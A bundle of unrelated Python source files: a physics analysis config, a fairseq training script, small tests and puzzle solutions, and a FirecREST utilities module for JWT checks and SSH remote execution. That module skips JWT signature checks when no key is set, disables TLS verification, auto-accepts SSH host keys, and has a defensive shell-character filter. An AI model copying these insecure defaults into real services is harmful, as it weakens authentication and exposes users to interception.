# adapt input collections
process.GammaJetAnalysis.photonCollName= cms.string("photons")
process.GammaJetAnalysis.electronCollName= cms.string("gsfElectrons")
process.GammaJetAnalysis.photonIdLooseName= cms.InputTag("PhotonIDProd","PhotonCutBasedIDLoose")
process.GammaJetAnalysis.photonIdTightName= cms.InputTag("PhotonIDProd","PhotonCutBasedIDTight")
# name of the process that used the GammaJetProd producer
#process.GammaJetAnalysis.prodProcess = cms.untracked.string('MYGAMMAJET')
# specify 'workOnAOD=2' to apply tokens from GammaJetProd producer
process.GammaJetAnalysis.workOnAOD = cms.int32(0)
process.GammaJetAnalysis.doGenJets = cms.bool(False)
process.GammaJetAnalysis.debug = cms.untracked.int32(0)
process.p = cms.Path(
process.seq_ak4PFCHS *
process.GammaJetAnalysis
)
|
#!/usr/bin/env python3 -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Train a new model on one or across multiple GPUs.
"""
import collections
import math
import random
import numpy as np
import torch
from fairseq import checkpoint_utils, distributed_utils, options, progress_bar, tasks, utils
from fairseq.data import iterators
from fairseq.trainer import Trainer
from fairseq.meters import AverageMeter, StopwatchMeter
def main(args, init_distributed=False):
utils.import_user_module(args)
assert args.max_tokens is not None or args.max_sentences is not None, \
'Must specify batch size either with --max-tokens or --max-sentences'
# Initialize CUDA and distributed training
if torch.cuda.is_available() and not args.cpu:
torch.cuda.set_device(args.device_id)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if init_distributed:
args.distributed_rank = distributed_utils.distributed_init(args)
if distributed_utils.is_master(args):
checkpoint_utils.verify_checkpoint_directory(args.save_dir)
# Print args
print(args)
# Setup task, e.g., translation, language modeling, etc.
task = tasks.setup_task(args)
# Load valid dataset (we load training data below, based on the latest checkpoint)
for valid_sub_split in args.valid_subset.split(','):
task.load_dataset(valid_sub_split, combine=False, epoch=0)
# Build model and criterion
generator = task.build_model(args)
criterion = task.build_criterion(args)
print(generator)
print('| model {}, criterion {}'.format(args.arch, criterion.__class__.__name__))
print('| num. model params: {} (num. trained: {})'.format(
sum(p.numel() for p in generator.parameters()),
sum(p.numel() for p in generator.parameters() if p.requires_grad),
))
# Build trainer
trainer = Trainer(args, task, generator, criterion)
print('| training on {} GPUs'.format(args.distributed_world_size))
print('| max tokens per GPU = {} and max sentences per GPU = {}'.format(
args.max_tokens,
args.max_sentences,
))
# Load the latest checkpoint if one is available and restore the
# corresponding train iterator
extra_state, epoch_itr = checkpoint_utils.load_checkpoint(args, trainer)
# Train until the learning rate gets too small
max_epoch = args.max_epoch or math.inf
max_update = args.max_update or math.inf
lr = trainer.get_lr()
train_meter = StopwatchMeter()
train_meter.start()
valid_subsets = args.valid_subset.split(',')
while (
lr > args.min_lr
and (epoch_itr.epoch < max_epoch or (epoch_itr.epoch == max_epoch
and epoch_itr._next_epoch_itr is not None))
and trainer.get_num_updates() < max_update
):
# train for one epoch
train(args, trainer, task, epoch_itr)
if not args.disable_validation and epoch_itr.epoch % args.validate_interval == 0:
valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)
else:
valid_losses = [None]
# only use first validation loss to update the learning rate
lr = trainer.lr_step(epoch_itr.epoch, valid_losses[0])
# save checkpoint
if epoch_itr.epoch % args.save_interval == 0:
checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])
reload_dataset = ':' in getattr(args, 'data', '')
# sharded data: get train iterator for next epoch
epoch_itr = trainer.get_train_iterator(epoch_itr.epoch, load_dataset=reload_dataset)
train_meter.stop()
print('| done training in {:.1f} seconds'.format(train_meter.sum))
def train(args, trainer, task, epoch_itr):
"""Train the model for one epoch."""
# Update parameters every N batches
update_freq = args.update_freq[epoch_itr.epoch - 1] \
if epoch_itr.epoch <= len(args.update_freq) else args.update_freq[-1]
# Initialize data iterator
itr = epoch_itr.next_epoch_itr(
fix_batches_to_gpus=args.fix_batches_to_gpus,
shuffle=(epoch_itr.epoch >= args.curriculum),
)
itr = iterators.GroupedIterator(itr, update_freq)
progress = progress_bar.build_progress_bar(
args, itr, epoch_itr.epoch, no_progress_bar='simple',
)
extra_meters = collections.defaultdict(lambda: AverageMeter())
valid_subsets = args.valid_subset.split(',')
max_update = args.max_update or math.inf
for i, samples in enumerate(progress, start=epoch_itr.iterations_in_epoch):
log_output = trainer.train_step(samples)
if log_output is None:
continue
# log mid-epoch stats
stats = get_training_stats(trainer)
for k, v in log_output.items():
if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size']:
continue # these are already logged above
if 'loss' in k or k == 'accuracy':
extra_meters[k].update(v, log_output['sample_size'])
else:
extra_meters[k].update(v)
stats[k] = extra_meters[k].avg
progress.log(stats, tag='train', step=stats['num_updates'])
# ignore the first mini-batch in words-per-second and updates-per-second calculation
if i == 0:
trainer.get_meter('wps').reset()
trainer.get_meter('ups').reset()
num_updates = trainer.get_num_updates()
if (
not args.disable_validation
and args.save_interval_updates > 0
and num_updates % args.save_interval_updates == 0
and num_updates > 0
):
valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)
checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])
if num_updates >= max_update:
break
# log end-of-epoch stats
stats = get_training_stats(trainer)
for k, meter in extra_meters.items():
stats[k] = meter.avg
progress.print(stats, tag='train', step=stats['num_updates'])
# reset training meters
for k in [
'train_loss', 'train_nll_loss', 'wps', 'ups', 'wpb', 'bsz', 'gnorm', 'clip',
]:
meter = trainer.get_meter(k)
if meter is not None:
meter.reset()
def get_training_stats(trainer):
stats = collections.OrderedDict()
stats['loss'] = trainer.get_meter('train_loss')
if trainer.get_meter('train_nll_loss').count > 0:
nll_loss = trainer.get_meter('train_nll_loss')
stats['nll_loss'] = nll_loss
else:
nll_loss = trainer.get_meter('train_loss')
stats['ppl'] = utils.get_perplexity(nll_loss.avg)
stats['wps'] = trainer.get_meter('wps')
stats['ups'] = trainer.get_meter('ups')
stats['wpb'] = trainer.get_meter('wpb')
stats['bsz'] = trainer.get_meter('bsz')
stats['num_updates'] = trainer.get_num_updates()
stats['lr'] = trainer.get_lr()
stats['gnorm'] = trainer.get_meter('gnorm')
stats['clip'] = trainer.get_meter('clip')
stats['oom'] = trainer.get_meter('oom')
if trainer.get_meter('loss_scale') is not None:
stats['loss_scale'] = trainer.get_meter('loss_scale')
stats['wall'] = round(trainer.get_meter('wall').elapsed_time)
stats['train_wall'] = trainer.get_meter('train_wall')
return stats
def validate(args, trainer, task, epoch_itr, subsets):
"""Evaluate the model on the validation set(s) and return the losses."""
if args.fixed_validation_seed is not None:
# set fixed seed for every validation
utils.set_torch_seed(args.fixed_validation_seed)
valid_losses = []
for subset in subsets:
# Initialize data iterator
itr = task.get_batch_iterator(
dataset=task.dataset(subset),
max_tokens=args.max_tokens_valid,
max_sentences=args.max_sentences_valid,
max_positions=utils.resolve_max_positions(
task.max_positions(),
trainer.get_model().max_positions(),
),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
seed=args.seed,
num_shards=args.distributed_world_size,
shard_id=args.distributed_rank,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
progress = progress_bar.build_progress_bar(
args, itr, epoch_itr.epoch,
prefix='valid on \'{}\' subset'.format(subset),
no_progress_bar='simple'
)
# reset validation loss meters
for k in ['valid_loss', 'valid_nll_loss']:
meter = trainer.get_meter(k)
if meter is not None:
meter.reset()
extra_meters = collections.defaultdict(lambda: AverageMeter())
for sample in progress:
log_output = trainer.valid_step(sample)
for k, v in log_output.items():
if k in ['loss', 'nll_loss', 'ntokens', 'nsentences', 'sample_size']:
continue
extra_meters[k].update(v)
# log validation stats
stats = get_valid_stats(trainer, args, extra_meters)
for k, meter in extra_meters.items():
stats[k] = meter.avg
progress.print(stats, tag=subset, step=trainer.get_num_updates())
valid_losses.append(
stats[args.best_checkpoint_metric].avg
if args.best_checkpoint_metric == 'loss'
else stats[args.best_checkpoint_metric]
)
return valid_losses
def get_valid_stats(trainer, args, extra_meters=None):
stats = collections.OrderedDict()
stats['loss'] = trainer.get_meter('valid_loss')
if trainer.get_meter('valid_nll_loss').count > 0:
nll_loss = trainer.get_meter('valid_nll_loss')
stats['nll_loss'] = nll_loss
else:
nll_loss = stats['loss']
stats['ppl'] = utils.get_perplexity(nll_loss.avg)
stats['num_updates'] = trainer.get_num_updates()
if hasattr(checkpoint_utils.save_checkpoint, 'best'):
key = 'best_{0}'.format(args.best_checkpoint_metric)
best_function = max if args.maximize_best_checkpoint_metric else min
current_metric = None
if args.best_checkpoint_metric == 'loss':
current_metric = stats['loss'].avg
elif args.best_checkpoint_metric in extra_meters:
current_metric = extra_meters[args.best_checkpoint_metric].avg
elif args.best_checkpoint_metric in stats:
current_metric = stats[args.best_checkpoint_metric]
else:
raise ValueError("best_checkpoint_metric not found in logs")
stats[key] = best_function(
checkpoint_utils.save_checkpoint.best,
current_metric,
)
return stats
def distributed_main(i, args, start_rank=0):
args.device_id = i
if args.distributed_rank is None: # torch.multiprocessing.spawn
args.distributed_rank = start_rank + i
main(args, init_distributed=True)
def cli_main():
parser = options.get_training_parser()
args = options.parse_args_and_arch(parser)
if args.distributed_init_method is None:
distributed_utils.infer_init_method(args)
if args.distributed_init_method is not None:
# distributed training
if torch.cuda.device_count() > 1 and not args.distributed_no_spawn:
start_rank = args.distributed_rank
args.distributed_rank = None # assign automatically
torch.multiprocessing.spawn(
fn=distributed_main,
args=(args, start_rank),
nprocs=torch.cuda.device_count(),
)
else:
distributed_main(args.device_id, args)
elif args.distributed_world_size > 1:
# fallback for single node with multiple GPUs
assert args.distributed_world_size <= torch.cuda.device_count()
port = random.randint(10000, 20000)
args.distributed_init_method = 'tcp://localhost:{port}'.format(port=port)
args.distributed_rank = None # set based on device id
if max(args.update_freq) > 1 and args.ddp_backend != 'no_c10d':
print('| NOTE: you may get better performance with: --ddp-backend=no_c10d')
torch.multiprocessing.spawn(
fn=distributed_main,
args=(args, ),
nprocs=args.distributed_world_size,
)
else:
# single GPU training
main(args)
if __name__ == '__main__':
cli_main()
|
# -*- coding: utf-8 -*-
#
# SPDX-FileCopyrightText: © 2019 The glucometerutils Authors
# SPDX-License-Identifier: MIT
"""Tests for the TD-4277 driver."""
# pylint: disable=protected-access,missing-docstring
import datetime
from absl.testing import parameterized
from glucometerutils.drivers import td4277
class TestTD4277Nexus(parameterized.TestCase):
@parameterized.parameters(
(b"\x21\x24\x0e\x15", datetime.datetime(2018, 1, 1, 21, 14)),
(b"\x21\x26\x0e\x15", datetime.datetime(2019, 1, 1, 21, 14)),
(b"\x04\x27\x25\x0d", datetime.datetime(2019, 8, 4, 13, 37)),
)
def test_parse_datetime(self, message, date):
self.assertEqual(td4277._parse_datetime(message), date)
def test_making_message(self):
self.assertEqual(
td4277._make_packet(0x22, 0), b"\x51\x22\x00\x00\x00\x00\xa3\x16"
)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .language_metrics_secured_object import LanguageMetricsSecuredObject
class ProjectLanguageAnalytics(LanguageMetricsSecuredObject):
"""ProjectLanguageAnalytics.
:param namespace_id:
:type namespace_id: str
:param project_id:
:type project_id: str
:param required_permissions:
:type required_permissions: int
:param id:
:type id: str
:param language_breakdown:
:type language_breakdown: list of :class:`LanguageStatistics <project-analysis.v4_1.models.LanguageStatistics>`
:param repository_language_analytics:
:type repository_language_analytics: list of :class:`RepositoryLanguageAnalytics <project-analysis.v4_1.models.RepositoryLanguageAnalytics>`
:param result_phase:
:type result_phase: object
:param url:
:type url: str
"""
_attribute_map = {
'namespace_id': {'key': 'namespaceId', 'type': 'str'},
'project_id': {'key': 'projectId', 'type': 'str'},
'required_permissions': {'key': 'requiredPermissions', 'type': 'int'},
'id': {'key': 'id', 'type': 'str'},
'language_breakdown': {'key': 'languageBreakdown', 'type': '[LanguageStatistics]'},
'repository_language_analytics': {'key': 'repositoryLanguageAnalytics', 'type': '[RepositoryLanguageAnalytics]'},
'result_phase': {'key': 'resultPhase', 'type': 'object'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, namespace_id=None, project_id=None, required_permissions=None, id=None, language_breakdown=None, repository_language_analytics=None, result_phase=None, url=None):
super(ProjectLanguageAnalytics, self).__init__(namespace_id=namespace_id, project_id=project_id, required_permissions=required_permissions)
self.id = id
self.language_breakdown = language_breakdown
self.repository_language_analytics = repository_language_analytics
self.result_phase = result_phase
self.url = url
|
from skynet_resources.views.devices import DevicesView
from skynet_resources.views.rooms import RoomsView
|
import numpy as np
anchors = '10,13, 16,30, 33,23, 30,61, 62,45, 59,119, 116,90, 156,198, 373,326'
x = np.reshape(np.asarray(anchors.split(','), np.float32), [-1, 2])
y = np.expand_dims(x*2,1)
print(np.minimum(-y/2,-x/2))
|
#!/usr/bin/env python
# encoding: utf-8
"""
same_tree.py
Created by Shengwei on 2014-07-15.
"""
# https://oj.leetcode.com/problems/same-tree/
# tags: easy, tree, recursion
"""
Given two binary trees, write a function to check if they are equal or not.
Two binary trees are considered equal if they are structurally identical and the nodes have the same value.
"""
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param p, a tree node
# @param q, a tree node
# @return a boolean
def isSameTree(self, p, q):
if p is None and q is None:
return True
if not p or not q or p.val != q.val:
return False
return (
self.isSameTree(p.left, q.left) and
self.isSameTree(p.right, q.right)
)
|
from unittest import TestCase
from tests import abspath
from pytezos.repl.interpreter import Interpreter
from pytezos.michelson.converter import michelson_to_micheline
from pytezos.repl.parser import parse_expression
class OpcodeTestnot_binary_61(TestCase):
def setUp(self):
self.maxDiff = None
self.i = Interpreter(debug=True)
def test_opcode_not_binary_61(self):
res = self.i.execute(f'INCLUDE "{abspath("opcodes/contracts/not_binary.tz")}"')
self.assertTrue(res['success'])
res = self.i.execute('RUN (Right 8) None')
self.assertTrue(res['success'])
exp_val_expr = michelson_to_micheline('(Some -9)')
exp_val = parse_expression(exp_val_expr, res['result']['storage'].type_expr)
self.assertEqual(exp_val, res['result']['storage']._val)
|
import itertools
class Solution:
"""
@param n: non-negative integer, n posts
@param k: non-negative integer, k colors
@return: an integer, the total number of ways
"""
def numWays(self, n, k):
if k == 1:
if n == 1 or n == 2:
return 1
else:
return 0 # impossible
ways = 0
# insert clapboards
# 0, 1, 2, ..., floor(n/2) 2s
for i in range(n//2 + 1):
# for each clapboards-insertion, k * (k-1) * (k-1) ... painting ways
ways += len(list(itertools.combinations((n-i)*[0], i))) * k * (k-1) ** (n-i-1)
return ways
n = 3
k = 3
sol = Solution()
print(sol.numWays(n,k))
|
from .primarysalemint import primarysalemint
from .nftminted import nftminted
from .secondarysale import secondarysale
from .ticketinvalidated import ticketinvalidated
from .ticketscanned import ticketscanned
|
#
# Copyright (c) 2019-2021, ETH Zurich. All rights reserved.
#
# Please, refer to the LICENSE file in the root directory.
# SPDX-License-Identifier: BSD-3-Clause
#
import logging
import os
import jwt
import stat
import datetime
import hashlib
import tempfile
import json
import functools
from flask import request, jsonify, g
import requests
import urllib
import base64
import io
import re
import time
import threading
# Checks if an environment variable injected to F7T is a valid True value
# var <- object
# returns -> boolean
def get_boolean_var(var):
# ensure variable to be a string
var = str(var)
# True, true or TRUE
# Yes, yes or YES
# 1
return var.upper() == "TRUE" or var.upper() == "YES" or var == "1"
debug = get_boolean_var(os.environ.get("F7T_DEBUG_MODE", False))
AUTH_HEADER_NAME = 'Authorization'
realm_pubkey=os.environ.get("F7T_REALM_RSA_PUBLIC_KEY", '')
if realm_pubkey != '':
# headers are inserted here, must not be present
realm_pubkey = realm_pubkey.strip('\'"') # remove '"'
realm_pubkey = '-----BEGIN PUBLIC KEY-----\n' + realm_pubkey + '\n-----END PUBLIC KEY-----'
realm_pubkey_type = os.environ.get("F7T_REALM_RSA_TYPE").strip('\'"')
AUTH_AUDIENCE = os.environ.get("F7T_AUTH_TOKEN_AUD", '').strip('\'"')
ALLOWED_USERS = os.environ.get("F7T_AUTH_ALLOWED_USERS", '').strip('\'"').split(";")
AUTH_REQUIRED_SCOPE = os.environ.get("F7T_AUTH_REQUIRED_SCOPE", '').strip('\'"')
AUTH_ROLE = os.environ.get("F7T_AUTH_ROLE", '').strip('\'"')
CERTIFICATOR_URL = os.environ.get("F7T_CERTIFICATOR_URL")
TASKS_URL = os.environ.get("F7T_TASKS_URL")
F7T_SSH_CERTIFICATE_WRAPPER = get_boolean_var(os.environ.get("F7T_SSH_CERTIFICATE_WRAPPER", False))
# Fobidden chars on user path/parameters: wihtout scapes: < > | ; " ' & \ [ ] ( ) x00-x1F \x60
# r'...' specifies it's a regular expression with special treatment for \
FORBIDDEN_INPUT_CHARS = r'[\<\>\|\;\"\'\&\\\[\]\(\)\x00-\x1F\x60]'
# OPA endpoint
OPA_USE = get_boolean_var(os.environ.get("F7T_OPA_USE",False))
OPA_URL = os.environ.get("F7T_OPA_URL","http://localhost:8181").strip('\'"')
POLICY_PATH = os.environ.get("F7T_POLICY_PATH","v1/data/f7t/authz").strip('\'"')
### SSL parameters
USE_SSL = get_boolean_var(os.environ.get("F7T_USE_SSL", False))
SSL_CRT = os.environ.get("F7T_SSL_CRT", "")
SSL_KEY = os.environ.get("F7T_SSL_KEY", "")
TRACER_HEADER = "uber-trace-id"
# checks JWT from Keycloak, optionally validates signature. It only receives the content of header's auth pair (not key:content)
def check_header(header):
if debug:
logging.info('debug: header: ' + header)
# header = "Bearer ey...", remove first 7 chars
try:
if realm_pubkey == '':
if not debug:
logging.warning("WARNING: REALM_RSA_PUBLIC_KEY is empty, JWT tokens are NOT verified, setup is not set to debug.")
decoded = jwt.decode(header[7:], verify=False)
else:
if AUTH_AUDIENCE == '':
decoded = jwt.decode(header[7:], realm_pubkey, algorithms=realm_pubkey_type, options={'verify_aud': False})
else:
decoded = jwt.decode(header[7:], realm_pubkey, algorithms=realm_pubkey_type, audience=AUTH_AUDIENCE)
if AUTH_REQUIRED_SCOPE != "":
if AUTH_REQUIRED_SCOPE not in decoded["scope"].split():
return False
return True
except jwt.exceptions.InvalidSignatureError:
logging.error("JWT invalid signature", exc_info=True)
except jwt.ExpiredSignatureError:
logging.error("JWT token has expired", exc_info=True)
except jwt.InvalidAudienceError:
logging.error("JWT token invalid audience", exc_info=True)
except jwt.exceptions.InvalidAlgorithmError:
logging.error("JWT invalid signature algorithm", exc_info=True)
except Exception:
logging.error("Bad header or JWT, general exception raised", exc_info=True)
return False
# returns username
def get_username(header):
# header = "Bearer ey...", remove first 7 chars
try:
if realm_pubkey == '':
decoded = jwt.decode(header[7:], verify=False)
else:
decoded = jwt.decode(header[7:], realm_pubkey, algorithms=realm_pubkey_type, options={'verify_aud': False})
# check if it's a service account token
try:
if AUTH_ROLE in decoded["realm_access"]["roles"]:
clientId = decoded["clientId"]
username = decoded["resource_access"][clientId]["roles"][0]
return username
return decoded['preferred_username']
except Exception:
return decoded['preferred_username']
except jwt.exceptions.InvalidSignatureError:
logging.error("JWT invalid signature", exc_info=True)
except jwt.ExpiredSignatureError:
logging.error("JWT token has expired", exc_info=True)
except jwt.InvalidAudienceError:
logging.error("JWT token invalid audience", exc_info=True)
except jwt.exceptions.InvalidAlgorithmError:
logging.error("JWT invalid signature algorithm", exc_info=True)
except Exception:
logging.error("Bad header or JWT, general exception raised", exc_info=True)
return None
# function to check if pattern is in string
def in_str(stringval,words):
try:
stringval.index(words)
return True
except ValueError:
return False
# SSH certificates creation
# returns pub key certificate name
def create_certificate(headers, cluster_name, cluster_addr, command=None, options=None, exp_time=None):
"""
Args:
cluster_name = public name of system to be executed
cluster_addr = private DNS or IP of the system
command = command to be executed with the certificate (required)
option = parameters and options to be executed with {command}
exp_time = expiration time for SSH certificate
"""
reqURL = f"{CERTIFICATOR_URL}/?cluster={cluster_name}&addr={cluster_addr}"
if command:
logging.info(f"\tCommand: {command}")
reqURL += "&command=" + base64.urlsafe_b64encode(command.encode()).decode()
if options:
logging.info(f"\tOptions (truncated): {options:80}")
reqURL += "&option=" + base64.urlsafe_b64encode(options.encode()).decode()
if exp_time:
logging.info(f"\tExpiration: {exp_time} [s]")
reqURL += f"&exptime={exp_time}"
else:
logging.error('Tried to create certificate without command')
return [None, 1, 'Internal error']
if debug:
username = get_username(headers[AUTH_HEADER_NAME])
logging.info(f"Create certificate for user {username}")
if options:
# may contain Storage URL
logging.info(f"\tOptions (complete): {options}")
logging.info(f"Request URL: {reqURL}")
try:
resp = requests.get(reqURL, headers=headers, verify= (SSL_CRT if USE_SSL else False) )
if resp.status_code != 200:
return [None, resp.status_code, resp.json()["description"]]
jcert = resp.json()
# create temp dir to store certificate for this request
td = tempfile.mkdtemp(prefix="dummy")
os.symlink(os.getcwd() + "/user-key.pub", td + "/user-key.pub") # link on temp dir
os.symlink(os.getcwd() + "/user-key", td + "/user-key") # link on temp dir
certf = open(td + "/user-key-cert.pub", 'w')
certf.write(jcert["certificate"])
certf.close()
# stat.S_IRUSR -> owner has read permission
os.chmod(td + "/user-key-cert.pub", stat.S_IRUSR)
# keys: [pub_cert, pub_key, priv_key, temp_dir]
return [td + "/user-key-cert.pub", td + "/user-key.pub", td + "/user-key", td]
except requests.exceptions.SSLError as ssle:
logging.error(f"(-2) -> {ssle}")
logging.error(f"(-2) -> {ssle.strerror}")
return [None, -2, ssle]
except IOError as ioe:
logging.error(f"({ioe.errno}) -> {ioe.strerror}", exc_info=True)
return [None, ioe.errno, ioe.strerror]
except Exception as e:
logging.error(f"({type(e)}) -> {e}", exc_info=True)
return [None, -1, e]
# execute remote commands with Paramiko:
def exec_remote_command(headers, system_name, system_addr, action, file_transfer=None, file_content=None):
import paramiko, socket
logging.info(f'System name: {system_name} - action: {action}')
if file_transfer == "storage_cert":
# storage is using a previously generated cert, save cert list from content
# cert_list: list of 4 elements that contains
# [0] path to the public certificate
# [1] path to the public key for user
# [2] path to the priv key for user
# [3] path to the dir containing 3 previous files
cert_list = file_content
username = headers
else:
# get certificate:
# if OK returns: [pub_cert, pub_key, priv_key, temp_dir]
# if FAILED returns: [None, errno, strerror]
cert_list = create_certificate(headers, system_name, system_addr, command=action)
if cert_list[0] == None:
result = {"error": cert_list[1], "msg": cert_list[2]}
return result
username = get_username(headers[AUTH_HEADER_NAME])
[pub_cert, pub_key, priv_key, temp_dir] = cert_list
# -------------------
# remote exec with paramiko
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ipaddr = system_addr.split(':')
host = ipaddr[0]
if len(ipaddr) == 1:
port = 22
else:
port = int(ipaddr[1])
client.connect(hostname=host, port=port,
username=username,
key_filename=pub_cert,
allow_agent=False,
look_for_keys=False,
timeout=10)
if F7T_SSH_CERTIFICATE_WRAPPER:
if debug:
logging.info(f"Using F7T_SSH_CERTIFICATE_WRAPPER.")
# read cert to send it as a command to the server
with open(pub_cert, 'r') as cert_file:
cert = cert_file.read().rstrip("\n") # remove newline at the end
action = cert
stdin, stdout, stderr = client.exec_command(action)
if file_transfer == "upload":
# uploads use "cat", so write to stdin
stdin.channel.sendall(file_content)
stdin.channel.shutdown_write()
#stdin.channel.close()
output = ""
error = ""
finished = 0
stderr_errno = -2
stdout_errno = -2
stderr_errda = ""
stdout_errda = ""
# poll process status since directly using recv_exit_status() could result
# in a permanent hang when remote output is larger than the current Transport or session’s window_size
while True:
if stderr.channel.exit_status_ready():
logging.info(f"stderr channel exit status ready")
stderr_errno = stderr.channel.recv_exit_status()
endtime = time.time() + 30
eof_received = True
while not stderr.channel.eof_received:
# time.sleep(0.5)
if time.time() > endtime:
stderr.channel.close()
eof_received = False
break
if eof_received:
error = "".join(stderr.readlines())
# error = stderr.read()
# clean "tput: No ..." lines at error output
stderr_errda = clean_err_output(error)
break
# else:
# time.sleep(5)
#for i in range(0,10):
while True:
if stdout.channel.exit_status_ready():
logging.info(f"stdout channel exit status ready")
stdout_errno = stdout.channel.recv_exit_status()
endtime = time.time() + 30
eof_received = True
while not stdout.channel.eof_received:
# time.sleep(0.5)
if time.time() > endtime:
stdout.channel.close()
eof_received = False
break
if eof_received:
output = "".join(stdout.readlines())
# error = stderr.read() it hangs
# clean "tput: No ..." lines at error output
stdout_errda = clean_err_output(output)
break
# else:
# time.sleep(5)
if file_transfer == "download":
outlines = output
else:
# replace newlines with $ for parsing
outlines = output.replace('\n', '$')[:-1]
# hiding success results from utilities/download, since output is the content of the file
if file_transfer == "download":
if stderr_errno !=0:
logging.info(f"stderr: ({stderr_errno}) --> {stderr_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {stdout_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {outlines}")
else:
logging.info(f"stderr: ({stderr_errno}) --> Download OK (content hidden)")
logging.info(f"stdout: ({stdout_errno}) --> Download OK (content hidden)")
else:
logging.info(f"stderr: ({stderr_errno}) --> {stderr_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {stdout_errda}")
logging.info(f"stdout: ({stdout_errno}) --> {outlines}")
if stderr_errno == 0:
if stderr_errda and not (in_str(stderr_errda,"Could not chdir to home directory") or in_str(stderr_errda,"scancel: Terminating job")):
result = {"error": 1, "msg": stderr_errda}
elif in_str(stdout_errda, "No such file"): # in case that error is 0 and the msg is on the stdout (like with some file)
result = {"error": 1, "msg": stdout_errda}
elif in_str(stdout_errda, "no read permission"): # in case that error is 0 and the msg is on the stdout (like with some file)
result = {"error": 1, "msg": stdout_errda}
elif in_str(stdout_errda, "cannot open"): # in case that error is 0 and the msg is on the stdout (like with some file)
result = {"error": 1, "msg": stdout_errda}
else:
result = {"error": 0, "msg": outlines}
elif stderr_errno > 0:
if stderr_errno == 7:
result = {"error": 7, "msg": "Failed to connect to staging area server"}
else:
result = {"error": stderr_errno, "msg": stderr_errda or stdout_errda}
elif len(stderr_errda) > 0:
result = {"error": 1, "msg": stderr_errda}
elif stdout_errno == -2:
result = {"error": -2, "msg": "Receive ready timeout exceeded"}
elif stderr_errno == -1:
result = {"error": -1, "msg": "No exit status was provided by the server"}
# first if paramiko exception raise
except paramiko.ssh_exception.NoValidConnectionsError as e:
logging.error(type(e), exc_info=True)
if e.errors:
for k, v in e.errors.items():
logging.error(f"errorno: {v.errno}")
logging.error(f"strerr: {v.strerror}")
result = {"error": v.errno, "msg": v.strerror}
except socket.gaierror as e:
logging.error(type(e), exc_info=True)
logging.error(e.errno)
logging.error(e.strerror)
result = {"error": e.errno, "msg": e.strerror}
except paramiko.ssh_exception.SSHException as e:
logging.error(type(e), exc_info=True)
logging.error(e)
result = {"error": 1, "msg": str(e)}
# second: time out
except socket.timeout as e:
logging.error(type(e), exc_info=True)
# timeout has not errno
logging.error(e)
result = {"error": 1, "msg": e.strerror}
except Exception as e:
logging.error(type(e), exc_info=True)
result = {"error": 1, "msg": str(e)}
finally:
client.close()
os.remove(pub_cert)
os.remove(pub_key)
os.remove(priv_key)
os.rmdir(temp_dir)
# hiding results from utilities/download, since output is the content of the file
if file_transfer == "download":
logging.info(f"Result: status_code {result['error']} -> Utilities download")
else:
logging.info(f"Result: status_code {result['error']} -> {result['msg']}")
return result
# clean TERM errors on stderr
# resaon: some servers produces this error becuase don't set a TERM
def clean_err_output(tex):
lines = ""
# python3 tex comes as a byte object, needs to be decoded to a str
#tex = tex.decode('utf-8')
for t in tex.split('\n'):
if t != 'tput: No value for $TERM and no -T specified':
lines += t
return lines
def parse_io_error(retval, operation, path):
"""
As command ended with error, create message to return to user
Args: retval (from exec_remote_command)
operation, path:
return:
jsonify('error message'), error_code (4xx), optional_header
"""
header = ''
if retval["error"] == 13:
# IOError 13: Permission denied
header = {"X-Permission-Denied": "User does not have permissions to access machine or paths"}
elif retval["error"] == 2:
# IOError 2: no such file
header = {"X-Invalid-Path": f"{path} is invalid."}
elif retval["error"] == -2:
# IOError -2: name or service not known
header = {"X-Machine-Not-Available": "Machine is not available"}
elif retval["error"] == 118:
header = {"X-Permission-Denied": "Internal SSH error"}
elif in_str(retval["msg"],"Permission") or in_str(retval["msg"],"OPENSSH"):
header = {"X-Permission-Denied": "User does not have permissions to access machine or paths"}
return jsonify(description = f"Failed to {operation}"), 400, header
# function to call create task entry API in Queue FS, returns task_id for new task
def create_task(headers, service=None):
# returns {"task_id":task_id}
# first try to get up task microservice:
try:
# X-Firecrest-Service: service that created the task
headers["X-Firecrest-Service"] = service
req = requests.post(f"{TASKS_URL}/", headers=headers, verify=(SSL_CRT if USE_SSL else False))
except requests.exceptions.ConnectionError as e:
logging.error(type(e), exc_info=True)
logging.error(e)
return -1
if req.status_code != 201:
return -1
logging.info(json.loads(req.content))
resp = json.loads(req.content)
task_id = resp["hash_id"]
return task_id
# function to call update task entry API in Queue FS
def update_task(task_id, headers, status, msg=None, is_json=False):
logging.info(f"Update {TASKS_URL}/{task_id} -> status: {status}")
data = {"status": status, "msg": msg}
if is_json:
req = requests.put(f"{TASKS_URL}/{task_id}",
json=data, headers=headers, verify=(SSL_CRT if USE_SSL else False))
else:
req = requests.put(f"{TASKS_URL}/{task_id}",
data=data, headers=headers, verify=(SSL_CRT if USE_SSL else False))
resp = json.loads(req.content)
return resp
# function to call update task entry API in Queue FS
def expire_task(task_id, headers, service):
logging.info(f"{TASKS_URL}/expire/{task_id}")
try:
headers["X-Firecrest-Service"] = service
req = requests.post(f"{TASKS_URL}/expire/{task_id}",
headers=headers, verify=(SSL_CRT if USE_SSL else False))
except Exception as e:
logging.error(type(e))
logging.error(e.args)
if not req.ok:
logging.info(req.json())
return False
return True
